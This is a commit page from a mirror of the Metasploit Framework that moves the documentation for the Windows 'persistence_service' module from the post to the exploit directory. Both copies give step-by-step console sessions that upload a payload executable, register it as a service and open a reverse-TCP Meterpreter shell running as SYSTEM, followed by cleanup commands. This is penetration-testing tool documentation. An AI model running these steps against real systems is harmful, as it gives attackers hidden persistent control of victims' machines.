infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Move doc as the module do.

GSoC/Meterpreter_Web_Console
Green-m 2018-10-22 18:10:39 +08:00
parent 4711d6ba08
commit 8a89e8c00c
No known key found for this signature in database
GPG Key ID: 7A4A0E684B5D6747
2 changed files with 130 additions and 113 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

130
documentation/modules/exploit/windows/local/persistence_service.md Normal file
View File

@ -0,0 +1,130 @@
## Overview
This Module will generate and upload an executable to a remote host, next will make it a persistent service.
It will create a new service which will start the payload whenever the service is running. Admin or system privilege is required.
## Module Options
**REMOTE_EXE_NAME**
The remote victim name. Random string as default.
**REMOTE_EXE_PATH**
The remote victim exe path to run. Use temp directory as default.
**RETRY_TIME**
The retry time that shell connect failed. 5 seconds as default.
**SERVICE_DESCRIPTION**
The description of service. Random string as default.
**SERVICE_NAME**
The name of service. Random string as default.
## Verification steps
1. get session on target
2. `use exploit/windows/local/persistence_service`
3. `set payload <payload>`
4. `set lport <lport>`
5. `set lhost <lhost>`
6. `exploit`
## Usage
### Windows 7 sp1 x64
```
msf5 exploit(windows/local/persistence_service) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: test-PC\test
meterpreter > sysinfo
Computer : TEST-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(windows/local/persistence_service) >
msf5 exploit(windows/local/persistence_service) > use exploit/windows/local/persistence_service
msf5 exploit(windows/local/persistence_service) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/persistence_service) > set lport 2333
lport => 2333
msf5 exploit(windows/local/persistence_service) > set lhost 192.168.56.1
msf5 exploit(windows/local/persistence_service) > options
Module options (exploit/windows/local/persistence_service):
Name Current Setting Required Description
---- --------------- -------- -----------
REMOTE_EXE_NAME no The remote victim name. Random string as default.
REMOTE_EXE_PATH no The remote victim exe path to run. Use temp directory as default.
RETRY_TIME 5 no The retry time that shell connect failed. 5 seconds as default.
SERVICE_DESCRIPTION no The description of service. Random string as default.
SERVICE_NAME no The name of service. Random string as default.
SESSION 1 yes The session to run this module on.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.56.1 yes The listen address (an interface may be specified)
LPORT 2333 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows
msf5 exploit(windows/local/persistence_service) > exploit
[*] Started reverse TCP handler on 192.168.56.1:2333
[*] Running module against TEST-PC
[+] Meterpreter service exe written to C:\Users\test\AppData\Local\Temp\NVNvCyn.exe
[*] Creating service NePaGwA
[*] Cleanup Meterpreter RC File: /Users/green/.msf4/logs/persistence/TEST-PC_20181022.5605/TEST-PC_20181022.5605.rc
[*] Sending stage (179779 bytes) to 192.168.56.101
[*] Meterpreter session 4 opened (192.168.56.1:2333 -> 192.168.56.101:52781) at 2018-10-22 17:56:21 +0800
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : TEST-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > background
[*] Backgrounding session 4...
```
**Clean it**
```
msf5 exploit(windows/local/persistence_service) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > resource /Users/green/.msf4/logs/persistence/TEST-PC_20181022.5605/TEST-PC_20181022.5605.rc
[*] Processing /Users/green/.msf4/logs/persistence/TEST-PC_20181022.5605/TEST-PC_20181022.5605.rc for ERB directives.
resource (/Users/green/.msf4/logs/persistence/TEST-PC_20181022.5605/TEST-PC_20181022.5605.rc)> execute -H -f sc.exe -a "stop NePaGwA"
Process 6516 created.
resource (/Users/green/.msf4/logs/persistence/TEST-PC_20181022.5605/TEST-PC_20181022.5605.rc)> execute -H -f sc.exe -a "delete NePaGwA"
Process 6624 created.
resource (/Users/green/.msf4/logs/persistence/TEST-PC_20181022.5605/TEST-PC_20181022.5605.rc)> execute -H -i -f taskkill.exe -a "/f /im NVNvCyn.exe"
Process 5636 created.
Channel 23 created.
SUCCESS: The process "NVNvCyn.exe" with PID 5180 has been terminated.
SUCCESS: The process "NVNvCyn.exe" with PID 4828 has been terminated.
SUCCESS: The process "NVNvCyn.exe" with PID 5728 has been terminated.
resource (/Users/green/.msf4/logs/persistence/TEST-PC_20181022.5605/TEST-PC_20181022.5605.rc)> rm C:\\Users\\test\\AppData\\Local\\Temp\\NVNvCyn.exe
meterpreter >
```

113
documentation/modules/post/windows/manage/persistence_service.md
View File

@ -1,113 +0,0 @@
## Overview
This Module will generate and upload an executable to a remote host, next will make it a persistent service.
It will create a new service which will start the payload whenever the service is running. Admin or system privilege is required.
## Module Options
**LHOST**
IP of host that will receive the connection from the payload.
**LPORT**
Port for Payload to connect to. Default: `4433`
**OPTIONS**
Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
For example: 'AutoLoadStdapi=false,StagerRetryCount=20'
**PAYLOAD**
The payload to use in the service. Default: `windows/meterpreter/reverse_tcp`
**HANDLER**
Start an exploit/multi/handler to receive the connection.
## Verification steps
1. get session on target
2. `use post/windows/manage/persistence_service`
3. `set payload <payload>`
4. `set lport <lport>`
5. `set lhost <lhost>`
6. `set handler true`
7. `run`
## Usage
### Windows 7 sp1 x64
```
msf5 post(windows/manage/persistence_service) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: test-PC\test
meterpreter > sysinfo
Computer : TEST-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > background
[*] Backgrounding session 1...
msf5 post(windows/manage/persistence_service) > options
Module options (post/windows/manage/persistence_service):
Name Current Setting Required Description
---- --------------- -------- -----------
HANDLER true no Start an exploit/multi/handler to receive the connection
LHOST 192.168.56.1 yes IP of host that will receive the connection from the payload.
LPORT 4433 no Port for Payload to connect to.
OPTIONS no Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
PAYLOAD windows/meterpreter/reverse_tcp no The payload to use in the service.
SESSION 1 yes The session to run this module on.
msf5 post(windows/manage/persistence_service) > run
[*] Running module against TEST-PC
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.56.1:4433
[+] Meterpreter service exe written to C:\Users\test\AppData\Local\Temp\IDJkb.exe
[*] Creating service pWbPkeDm
[*] Cleanup Meterpreter RC File: /Users/green/.msf4/logs/persistence/TEST-PC_20181017.3740/TEST-PC_20181017.3740.rc
[*] Post module execution completed
[*] Sending stage (179779 bytes) to 192.168.56.101
msf5 post(windows/manage/persistence_service) > [*] Meterpreter session 3 opened (192.168.56.1:4433 -> 192.168.56.101:50101) at 2018-10-17 18:37:51 +0800
msf5 post(windows/manage/persistence_service) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows test-PC\test @ TEST-PC 192.168.56.1:8888 -> 192.168.56.101:50098 (192.168.56.101)
3 meterpreter x86/windows NT AUTHORITY\SYSTEM @ TEST-PC 192.168.56.1:4433 -> 192.168.56.101:50101 (192.168.56.101)
msf5 post(windows/manage/persistence_service) >
```
**Clean it**
```
msf5 post(windows/manage/persistence_service) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > resource /Users/green/.msf4/logs/persistence/TEST-PC_20181017.3740/TEST-PC_20181017.3740.rc
[*] Processing /Users/green/.msf4/logs/persistence/TEST-PC_20181017.3740/TEST-PC_20181017.3740.rc for ERB directives.
resource (/Users/green/.msf4/logs/persistence/TEST-PC_20181017.3740/TEST-PC_20181017.3740.rc)> execute -H -f sc.exe -a "stop pWbPkeDm"
Process 9652 created.
resource (/Users/green/.msf4/logs/persistence/TEST-PC_20181017.3740/TEST-PC_20181017.3740.rc)> execute -H -f sc.exe -a "delete pWbPkeDm"
Process 9816 created.
resource (/Users/green/.msf4/logs/persistence/TEST-PC_20181017.3740/TEST-PC_20181017.3740.rc)> execute -H -i -f taskkill.exe -a "/f /im IDJkb.exe"
Process 9688 created.
Channel 13 created.
SUCCESS: The process "IDJkb.exe" with PID 8956 has been terminated.
SUCCESS: The process "IDJkb.exe" with PID 8280 has been terminated.
SUCCESS: The process "IDJkb.exe" with PID 4332 has been terminated.
resource (/Users/green/.msf4/logs/persistence/TEST-PC_20181017.3740/TEST-PC_20181017.3740.rc)> rm C:\\Users\\test\\AppData\\Local\\Temp\\IDJkb.exe
```